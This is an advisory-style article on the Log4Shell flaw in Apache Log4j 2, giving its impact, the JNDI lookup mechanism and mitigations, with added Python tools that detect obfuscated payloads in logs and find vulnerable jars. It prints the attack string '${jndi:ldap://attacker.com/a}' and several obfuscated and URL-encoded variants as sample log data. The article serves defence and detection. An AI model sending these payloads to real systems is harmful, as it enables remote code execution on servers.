Log4Shell, a critical vulnerability in Apache Log4j 2 that affects many Java projects

News recently broke that a critical vulnerability has been found in Apache Log4j 2, a popular logging framework for Java applications. It allows arbitrary code execution when a specially crafted value of the form "${jndi:URL}" is written to the log.

The vulnerability is notable because the attack works against any Java application that logs values obtained from external sources, for example by including an attacker-supplied value in an error message.

Almost all projects that use frameworks such as Apache Struts, Apache Solr, Apache Druid or Apache Flink are reported to be affected, including Steam, Apple iCloud, and Minecraft clients and servers.

The vulnerability is expected to set off a wave of attacks on enterprise applications, repeating the history of critical vulnerabilities in the Apache Struts framework, which by rough estimate is used in 65% of the web applications of Fortune 100 companies. Attempts to scan the network for vulnerable systems have already been recorded.

The vulnerability allows arbitrary code execution. Log4j 2 is a major Java logging library developed by the Apache Foundation. It is widely used in applications and is present as a dependency in many projects, including enterprise applications and numerous cloud services.

The Randori attack team has developed a working exploit and has successfully exploited this vulnerability in customer environments as part of our offensive security platform.

The vulnerability can be reached through many application-specific paths. In fact, any scenario that lets a remote connection supply arbitrary data that an application using the Log4j library writes to its log files is susceptible to exploitation. This vulnerability is likely to be exploited heavily in the wild and could affect thousands of organizations. It represents a significant real risk to affected systems.

The problem is aggravated by the fact that a working exploit has already been published, while at the time of the initial report no fix was yet available for the stable branches and no CVE identifier had been assigned (it has since been tracked as CVE-2021-44228). The fix was at first only included in the test branch log4j-2.15.0-rc1. As a workaround to block the vulnerability, it is recommended to set the log4j2.formatMsgNoLookups parameter to true.

The problem stems from the fact that Log4j 2 processes special "${...}" lookup masks found in log lines, including in the logged message text itself, and one of the supported lookups issues JNDI (Java Naming and Directory Interface) queries.

In its analysis of CVE-2021-44228, Randori determined the following:

  • Default installations of widely used enterprise software are vulnerable.
  • The vulnerability can be exploited reliably and without authentication.
  • The vulnerability affects multiple versions of Log4j 2.
  • The vulnerability allows remote code execution as the user running the application that uses the library.

The attack boils down to passing a string containing the substitution "${jndi:ldap://attacker.com/a}". When Log4j 2 processes it, it sends an LDAP request to the server attacker.com asking for a reference to a Java class. The class location returned by the attacker's server (for example http://example.com/Exploit.class; both hostnames here are illustrative) is then loaded and executed in the context of the current process, giving the attacker arbitrary code execution with the privileges of the affected application. Note that restrictions in newer JVMs on loading classes from remote codebases narrow this direct path but are not a substitute for patching: the lookup itself still fires, and other ways of turning the JNDI response into code execution exist.
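The lookup mechanism described above, and in particular the fact that Log4j resolves nested "${...}" expressions before performing the outer lookup, is what makes naive string matching for "${jndi:" insufficient when hunting for exploitation attempts in logs. The following detector is an added example written for this page, not code from the original article, from Randori or from the Log4j project. It models only the pieces of Log4j's substitution that attackers use for obfuscation (the lower/upper lookups and the ":-" default-value syntax) and assumes that env/sys/date lookups fail on the victim so that their default applies; the access-log lines it scans are constructed sample data, and attacker.com is used as a placeholder host:

```python
import re
from urllib.parse import unquote

# Innermost ${...} with no nested braces: the unit Log4j's StrSubstitutor resolves first.
INNER = re.compile(r"\$\{([^${}]*)\}")


def normalize(text, findings):
    """Evaluate lookups the way a vulnerable Log4j 2 would, so obfuscated forms such as
    ${${lower:j}ndi:...}, ${${::-j}ndi:...} or ${${env:NaN:-j}ndi:...} collapse to the
    plain ${jndi:...} form. Every JNDI target reached is appended to `findings`.
    Assumption: only lower/upper and the ':-' default are modelled; env/sys/date
    lookups are treated as failing on the victim, so their default is substituted."""

    def resolve(match):
        body = match.group(1)
        name, has_default, default = body.partition(":-")
        prefix, has_arg, arg = name.partition(":")
        key = prefix.lower()
        if key == "jndi" and has_arg:
            # Log4j performs the JNDI lookup before considering any ':-' default,
            # so a default cannot be used to hide the target.
            findings.append(arg)
            return "\x00" + body + "\x01"        # keep the text but stop re-matching it
        if key == "lower" and has_arg:
            return arg.lower()
        if key == "upper" and has_arg:
            return arg.upper()
        if has_default:
            return default
        return "\x00" + body + "\x01"            # unresolvable: Log4j leaves it as-is

    prev = None
    while prev != text:
        prev, text = text, INNER.sub(resolve, text)
    return text.replace("\x00", "${").replace("\x01", "}")


def scan(log_lines):
    """Return (line number, scheme, target) for every JNDI lookup a vulnerable
    Log4j 2 would have performed while logging the line."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        decoded = unquote(unquote(line))   # access logs usually hold URL-encoded payloads
        findings = []
        normalize(decoded, findings)
        for target in findings:
            scheme = target.split(":", 1)[0].lower()
            hits.append((number, scheme, target))
    return hits


# Constructed sample access-log lines: one benign request, three exploitation attempts
# (plain, nested-lookup obfuscated, URL-encoded) and one harmless non-JNDI lookup.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://attacker.com/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:11 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://attacker.com/b} HTTP/1.1" 400 0',
    '10.0.0.9 - - [10/Dec/2021:03:14:12 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Fattacker.com%2Fc%7D HTTP/1.1" 400 0',
    '10.0.0.7 - - [10/Dec/2021:03:14:13 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for number, scheme, target in scan(SAMPLE_LOG):
        print("line %d: %s lookup to %s" % (number, scheme, target))
```

Because the resolver reproduces what the vulnerable library would do rather than enumerating known evasion strings, it also catches variants it was not written against (for example a scheme spelled out letter by letter with "${::-l}${::-d}..."), and it records the target host, which is what you need for blocking and for scoping the incident.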

Finally, it is noted that if an anomaly is detected, it is recommended to assume that this is an active incident, that the system has been compromised, and to respond accordingly. Upgrading to patched versions of Log4j 2 or of the affected applications will eliminate this vulnerability. Randori recommends that any organization that believes it may be affected upgrade urgently to a patched version.

In the latest update from the Apache Log4j team, organizations are advised to do the following:

  • Upgrade to Log4j 2.15.0.
  • For those who cannot upgrade to 2.15.0: in versions >= 2.10, this vulnerability can be mitigated by setting the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
  • For versions 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
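Applying those three options across a fleet first requires knowing which log4j-core copies exist, what version each is, and whether the JndiLookup class has already been removed. The scanner below is an added example for this page, not a tool from the Log4j project or from Randori. It reads the version from the pom.properties that Maven-built log4j-core jars embed, classifies each jar against the advice above (2.15.0 is treated as the fixed release because that is the version the advisory names), looks one level into .war/.ear/fat-jar bundles, and offers a pure-Python equivalent of the "zip -d" mitigation. The jars it builds for the demonstration are constructed stand-ins containing only the two entries the scanner inspects, not real Log4j bytecode:

```python
import io
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED = re.compile(r"(^|/)log4j-core-[^/]*\.jar$")
FIXED = (2, 15, 0)           # release the advisory names as the fix
NO_LOOKUPS_MIN = (2, 10, 0)  # oldest release where log4j2.formatMsgNoLookups works


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0) (pre-release tags ignored)."""
    m = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", text)
    return tuple(int(part or 0) for part in m.groups())


def inspect_jar(data):
    """Classify one log4j-core jar from its embedded pom.properties version
    and whether JndiLookup.class is still present."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    has_jndi = JNDI_CLASS in names
    if version is None:
        status = "unknown (no pom.properties)"
    elif parse_version(version) >= FIXED:
        status = "patched"
    elif not has_jndi:
        status = "mitigated"
    elif parse_version(version) >= NO_LOOKUPS_MIN:
        status = "vulnerable (upgrade, or set log4j2.formatMsgNoLookups=true)"
    else:
        status = "vulnerable (upgrade, or remove JndiLookup.class)"
    return {"version": version, "jndi_lookup": has_jndi, "status": status}


def strip_jndi_lookup(data):
    """Same effect as 'zip -q -d log4j-core-*.jar .../JndiLookup.class':
    rewrite the jar with every entry except JndiLookup.class."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_CLASS:
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def scan_tree(root):
    """Walk a directory and classify every log4j-core jar found, including copies
    bundled inside .war/.ear/fat-jar archives (one level deep)."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith((".jar", ".war", ".ear")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            try:
                if NESTED.search(name):
                    results[path] = inspect_jar(data)
                with zipfile.ZipFile(io.BytesIO(data)) as zf:
                    for entry in zf.namelist():
                        if NESTED.search(entry):
                            results[path + "!" + entry] = inspect_jar(zf.read(entry))
            except zipfile.BadZipFile:
                results[path] = {"version": None, "jndi_lookup": False, "status": "unreadable"}
    return results


def make_sample_jar(version, with_jndi=True):
    """Constructed stand-in for a real log4j-core jar: only the two entries the
    scanner looks at, with placeholder bytes instead of real bytecode."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion=%s\n" % version)
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe placeholder")
    return buf.getvalue()


def demo():
    """Build a throwaway tree with a 2.14.1 jar and a WAR bundling an already
    stripped 2.8.2 copy, then scan it. Returns {relative path: status}."""
    root = tempfile.mkdtemp()
    lib = os.path.join(root, "app", "lib")
    os.makedirs(lib)
    with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(make_sample_jar("2.14.1"))
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.8.2.jar", strip_jndi_lookup(make_sample_jar("2.8.2")))
    with open(os.path.join(root, "app.war"), "wb") as fh:
        fh.write(war.getvalue())
    return {os.path.relpath(path, root).replace(os.sep, "/"): info["status"]
            for path, info in scan_tree(root).items()}


if __name__ == "__main__":
    for path, status in demo().items():
        print(path, "->", status)
```

Two practical points the classification encodes: a jar is only "mitigated" when JndiLookup.class is actually gone, so a class stripped by "zip -d" shows up correctly even though its version string is unchanged; and the formatMsgNoLookups recommendation is only offered for 2.10 and later, because on older releases the property does nothing and removing the class is the only non-upgrade option the advisory gives.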

Source: https://www.lunasec.io/
